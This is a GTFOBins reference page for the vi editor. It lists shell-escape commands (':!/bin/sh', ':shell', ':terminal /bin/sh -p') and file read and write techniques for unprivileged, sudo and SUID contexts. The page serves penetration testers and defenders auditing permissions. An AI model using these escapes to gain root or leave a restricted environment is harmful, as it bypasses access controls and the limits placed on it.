vi | GTFOBins

.. / vi

Fork Star

Shell

This executable can spawn an interactive system shell.

Unprivileged

This function can be performed by any unprivileged user.

vi -c ':!/bin/sh' /dev/null

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

vi -c ':!/bin/sh' /dev/null

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks

This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

vi -c ':!/bin/sh' /dev/null

Unprivileged

This function can be performed by any unprivileged user.

vi
:shell

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

vi
:shell

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks

This executable runs commands using the system shell, e.g., via functions like system, so it only works for distributions where the shell does not drop SUID privileges.

vi
:shell

Unprivileged

This function can be performed by any unprivileged user.

vi -c :terminal /bin/sh

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

vi -c :terminal /bin/sh

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

Remarks

This executable runs commands directly, e.g., via functions like exec, remember to omit the -p argument of every /bin/sh invocation for distributions where the default shell does not drop SUID privileges.

vi -c ':terminal /bin/sh -p'

File write

This executable can write data to local files.

Comment

Where ^[ is the escape key.

Unprivileged

This function can be performed by any unprivileged user.

vi /path/to/output-file
iDATA
^[
w

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

vi /path/to/output-file
iDATA
^[
w

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

vi /path/to/output-file
iDATA
^[
w

File read

This executable can read data from local files.

Unprivileged

This function can be performed by any unprivileged user.

vi /path/to/input-file

Sudo

This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

Remarks

If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

vi /path/to/input-file

SUID

This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

vi /path/to/input-file